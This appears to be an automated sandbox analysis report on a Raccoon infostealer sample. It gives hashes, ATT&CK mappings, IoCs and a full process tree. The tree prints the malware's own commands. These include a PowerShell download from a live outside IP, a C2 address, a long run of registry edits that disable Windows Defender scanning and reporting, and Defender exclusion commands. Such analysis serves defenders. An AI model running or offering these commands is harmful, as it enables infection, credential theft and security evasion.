raccoon | 19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27-09-2022 04:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.exe
Size

4.5MB
MD5

f1f1bda661cb0a1a7477f4931971b43c
SHA1

e7f60b247d2cb6ca7c9e98fec7ed9c98ffe74c40
SHA256

19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b
SHA512

6b4dc4e6729d327bb4c7c7ae444dda0654d2889d89211c8f3718d6d9cf1eeb1fdad96eac79d9be4c02ff6e8a74bc0ab1fdf80a620e1e47f0532f7e1f16ae11bd
SSDEEP

98304:IkLl7m4J7yjqBPKxUYAf5AWZSdb6HmjBud1xZ73Oe9WJ:Xl92+oo5uBVCj73OmWJ

Score

10^/10

raccoon 9b19cf60d9bdf65b8a2495aa965456c3 discovery evasion spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://80.92.205.35/hfile.bin

Extracted

Family

raccoon

Botnet

9b19cf60d9bdf65b8a2495aa965456c3

http://94.131.107.206

rc4.plain

Signatures

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

0bQfA0Nw.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0bQfA0Nw.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 2884 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

MBSetup.exe

description ioc process

File created C:\Windows\SysWOW64\drivers\mbamtestfile.dat MBSetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0bQfA0Nw.exe

flow	pid	process
10	2884	powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\drivers\mbamtestfile.dat	MBSetup.exe

Executes dropped EXE 20 IoCs

Processes:

19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmpMBSetup.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exelrPBx4qjVQLL.exeI0cgFK13.exeHDni72ud.exe0bQfA0Nw.exe

pid	process
2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
4892	MBSetup.exe
3024	7za.exe
1960	7za.exe
4764	7za.exe
4888	7za.exe
1480	7za.exe
1704	7za.exe
916	7za.exe
312	7za.exe
4976	7za.exe
1800	7za.exe
1092	7za.exe
1340	7za.exe
1252	7za.exe
1460	7za.exe
5036	lrPBx4qjVQLL.exe
4236	I0cgFK13.exe
1456	HDni72ud.exe
4852	0bQfA0Nw.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0bQfA0Nw.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0bQfA0Nw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0bQfA0Nw.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmpcmd.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 4 IoCs

Processes:

19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmpInstallUtil.exe

pid process

2872 19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
3564 InstallUtil.exe
3564 InstallUtil.exe
3564 InstallUtil.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\0bQfA0Nw.exe	themida
C:\Users\Admin\AppData\Local\Temp\0bQfA0Nw.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

0bQfA0Nw.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0bQfA0Nw.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

lrPBx4qjVQLL.exe

description pid process target process

PID 5036 set thread context of 3564 5036 lrPBx4qjVQLL.exe InstallUtil.exe
Drops file in Program Files directory 1 IoCs

Processes:

MBSetup.exe

description ioc process

File created C:\Program Files (x86)\mbamtestfile.dat MBSetup.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings cmd.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

3444 PING.EXE
920 PING.EXE
4784 PING.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0bQfA0Nw.exe

description	pid	process	target process
PID 5036 set thread context of 3564	5036	lrPBx4qjVQLL.exe	InstallUtil.exe

description	ioc	process
File created	C:\Program Files (x86)\mbamtestfile.dat	MBSetup.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	cmd.exe

pid	process
3444	PING.EXE
920	PING.EXE
4784	PING.EXE

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmppowershell.exepowershell.exepowershell.exelrPBx4qjVQLL.exeHDni72ud.exeI0cgFK13.exe

pid	process
2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
2884	powershell.exe
2884	powershell.exe
3208	powershell.exe
3208	powershell.exe
4708	powershell.exe
4708	powershell.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
5036	lrPBx4qjVQLL.exe
1456	HDni72ud.exe
1456	HDni72ud.exe
1456	HDni72ud.exe
1456	HDni72ud.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe
4236	I0cgFK13.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeHDni72ud.exe

description	pid	process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	3208	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	1456	HDni72ud.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp

pid process

2872 19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.exe19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmpcmd.exeWScript.execmd.exe

description	pid	process	target process
PID 4464 wrote to memory of 2872	4464	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.exe	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
PID 4464 wrote to memory of 2872	4464	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.exe	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
PID 4464 wrote to memory of 2872	4464	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.exe	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
PID 2872 wrote to memory of 4892	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	MBSetup.exe
PID 2872 wrote to memory of 4892	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	MBSetup.exe
PID 2872 wrote to memory of 4892	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	MBSetup.exe
PID 2872 wrote to memory of 5004	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	cmd.exe
PID 2872 wrote to memory of 5004	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	cmd.exe
PID 2872 wrote to memory of 5004	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	cmd.exe
PID 2872 wrote to memory of 3024	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	7za.exe
PID 2872 wrote to memory of 3024	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	7za.exe
PID 2872 wrote to memory of 3024	2872	19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp	7za.exe
PID 5004 wrote to memory of 2884	5004	cmd.exe	powershell.exe
PID 5004 wrote to memory of 2884	5004	cmd.exe	powershell.exe
PID 5004 wrote to memory of 2884	5004	cmd.exe	powershell.exe
PID 5004 wrote to memory of 1960	5004	cmd.exe	7za.exe
PID 5004 wrote to memory of 1960	5004	cmd.exe	7za.exe
PID 5004 wrote to memory of 1960	5004	cmd.exe	7za.exe
PID 5004 wrote to memory of 3444	5004	cmd.exe	PING.EXE
PID 5004 wrote to memory of 3444	5004	cmd.exe	PING.EXE
PID 5004 wrote to memory of 3444	5004	cmd.exe	PING.EXE
PID 5004 wrote to memory of 3724	5004	cmd.exe	WScript.exe
PID 5004 wrote to memory of 3724	5004	cmd.exe	WScript.exe
PID 5004 wrote to memory of 3724	5004	cmd.exe	WScript.exe
PID 3724 wrote to memory of 4948	3724	WScript.exe	cmd.exe
PID 3724 wrote to memory of 4948	3724	WScript.exe	cmd.exe
PID 3724 wrote to memory of 4948	3724	WScript.exe	cmd.exe
PID 4948 wrote to memory of 1468	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 1468	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 1468	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3752	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3752	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3752	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2428	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2428	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2428	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2300	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2300	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2300	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3964	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3964	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3964	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3112	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3112	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3112	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 1928	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 1928	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 1928	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 740	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 740	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 740	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3476	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3476	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3476	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3128	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3128	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3128	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 424	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 424	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 424	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2672	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2672	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 2672	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 4492	4948	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.exe
"C:\Users\Admin\AppData\Local\Temp\19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Users\Admin\AppData\Local\Temp\is-OU0RH.tmp\19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OU0RH.tmp\19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.tmp" /SL5="$B006E,3757537,956928,C:\Users\Admin\AppData\Local\Temp\19747c0216f88bf606eaf488f0153524c0b7f9039565f6a32fbff6eecca4962b.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2872

C:\Users\Admin\AppData\Local\Temp\is-55OA4.tmp\MBSetup.exe
"C:\Users\Admin\AppData\Local\Temp\is-55OA4.tmp\MBSetup.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:4892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\main.bat" "
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy bypass -noprofile -command "(New-Object System.Net.WebClient).DownloadFile('http://80.92.205.35/hfile.bin', 'hfile.bin')";
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe x -y -p10619mlgrAGP7211mlgrAGP24753 "*.zip"
4⤵
- Executes dropped EXE
PID:1960

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
4⤵
- Runs ping.exe
PID:3444

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\SurfaceReduction\ControlSet003.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\ControlSet001_obf.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:1468

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:3752

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:2428

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:2300

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:3964

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:3112

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:740

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:3476

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:3128

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:424

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:2672

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:4492

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:3820

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:4688

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 1 /f
6⤵
PID:3160

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:2168

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:4956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SurfaceReduction"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionExtension ".exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\compil32_obf.bat" "
5⤵
PID:2184

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:3132

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e file.zip -p9178UTuitA24715UTuitA26909 -oextracted
6⤵
- Executes dropped EXE
PID:4764

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_11.zip -oextracted
6⤵
- Executes dropped EXE
PID:4888

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_10.zip -oextracted
6⤵
- Executes dropped EXE
PID:1480

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_9.zip -oextracted
6⤵
- Executes dropped EXE
PID:1704

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:916

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:312

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:4976

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:1340

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:1092

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:1800

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:1252

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:1460

C:\ProgramData\SurfaceReduction\lrPBx4qjVQLL.exe
"lrPBx4qjVQLL.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
PID:3420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
PID:4328

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
- Loads dropped DLL
PID:3564

C:\Users\Admin\AppData\Roaming\I0cgFK13.exe
"C:\Users\Admin\AppData\Roaming\I0cgFK13.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4236

C:\Users\Admin\AppData\Roaming\HDni72ud.exe
"C:\Users\Admin\AppData\Roaming\HDni72ud.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Users\Admin\AppData\Roaming\HDni72ud.exe
"C:\Users\Admin\AppData\Roaming\HDni72ud.exe"
9⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\0bQfA0Nw.exe
"C:\Users\Admin\AppData\Local\Temp\0bQfA0Nw.exe"
8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\ControlSet002.bat" "
5⤵
PID:4500

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
6⤵
- Runs ping.exe
PID:920

C:\Windows\SysWOW64\cmd.exe
cmd /c rd /q /s "C:\ProgramData\SurfaceReduction\"
6⤵
PID:4880

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
4⤵
- Runs ping.exe
PID:4784

C:\ProgramData\SurfaceReduction\7za.exe
"C:\ProgramData\SurfaceReduction\7za.exe" x "C:\ProgramData\SurfaceReduction\keys.zip" -o"C:\Users\Public\Desktop\" * -r -aoa
3⤵
- Executes dropped EXE
PID:3024

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

